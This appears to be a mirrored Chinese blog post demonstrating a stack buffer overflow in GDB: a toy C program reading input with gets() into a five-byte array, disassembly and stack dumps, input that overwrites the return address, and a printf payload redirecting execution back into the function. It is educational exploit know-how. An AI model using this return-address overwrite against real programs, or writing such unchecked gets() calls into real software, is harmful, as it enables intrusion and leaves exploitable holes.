• 用GDB示範Buffer Overflow 的過程


     1 #include <stdio.h>
     2 void return_input(void)
     3 {
     4     char array[5]; 
     5     
     6     gets(array);
     7     printf("%s\n", array);
     8 }
     9 main()
    10 {
    11 return_input();
    12 return 0;
    13 }

    >gdb -q overflow

    (gdb) disas return_input
    Dump of assembler code for function return_input:
    0x0040138c <+0>: push %ebp
    0x0040138d <+1>: mov %esp,%ebp
    0x0040138f <+3>: sub $0xc,%esp
    0x00401392 <+6>: lea -0x5(%ebp),%eax
    0x00401395 <+9>: mov %eax,(%esp)
    0x00401398 <+12>: call 0x401b1c <gets>
    0x0040139d <+17>: lea -0x5(%ebp),%eax
    0x004013a0 <+20>: mov %eax,(%esp)
    0x004013a3 <+23>: call 0x401b14 <puts>
    0x004013a8 <+28>: leave
    0x004013a9 <+29>: ret
    End of assembler dump.

    (gdb) b *0x00401398  //0x00401398 <+12>: call 0x401b1c <gets>
    Breakpoint 2 at 0x401398: file overflow.c, line 6.
    (gdb) b *0x004013a3  //0x004013a3 <+23>: call 0x401b14 <puts>
    Breakpoint 3 at 0x4013a3: file overflow.c, line 7.
    (gdb) r

    (gdb) disas main
    Dump of assembler code for function main:
    0x004013aa <+0>: push %ebp
    0x004013ab <+1>: mov %esp,%ebp
    0x004013ad <+3>: call 0x4018dc <__main>
    0x004013b2 <+8>: call 0x40138c <return_input>
    0x004013b7 <+13>: mov $0x0,%eax
    0x004013bc <+18>: pop %ebp
    0x004013bd <+19>: ret
    End of assembler dump.

    (gdb) x/20x $esp //0x004013b7為returnaddress,$esp=0x28ff14,$ebp=0x0028ff28
    0x28ff14: 0x0028ff1b 0x00000026 0x7efde000 0x0028ff28
    0x28ff24: 0x004013b7 0x0028ff68 0x004010b9 0x00000001
    0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
    0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
    0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811

    (gdb) cont
    Continuing.

    ABCDEDDDDDDDD

    (gdb) x/20x 0x28ff14
    0x28ff14: 0x0028ff1b 0x41000026 0x45444342 0x44444444
    0x28ff24: 0x44444444 0x0028ff00 0x004010b9 0x00000001
    0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
    0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
    0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811

    (gdb) step

    Program received signal SIGSEGV, Segmentation fault.
    0x44444444 in ?? ()  //成功改掉return address

    ====串改return address=====

    >printf "ABCDEDDDD\xb2\x13\x40\x00" | overflow  //jmp to 0x004013b2 <+8>: call 0x40138c <return_input>
    ABCDEDDDD?@
    ABCDEDDDD?@

  • 相关阅读:
    nginx使用vhost子目录
    nginx服务报错解决
    反向代理远端 单台tomcat 使用域名代理
    反向代理远端 单台tomcat 使用ip+端口
    nginx反向代理本地 两台web负载均衡 使用域名代理
    nginx反向代理本地 两台web负载均衡 使用ip+端口代理
    nginx反向代理本地 单台wed -使用域名代理
    nginx反向代理本地 单台wed -使用ip+端口代理
    php 在函数内引用全局变量 讲解引用
    Xdebug的安装与使用
  • 原文地址:https://www.cnblogs.com/bittorrent/p/2707319.html
Copyright © 2020-2023  润新知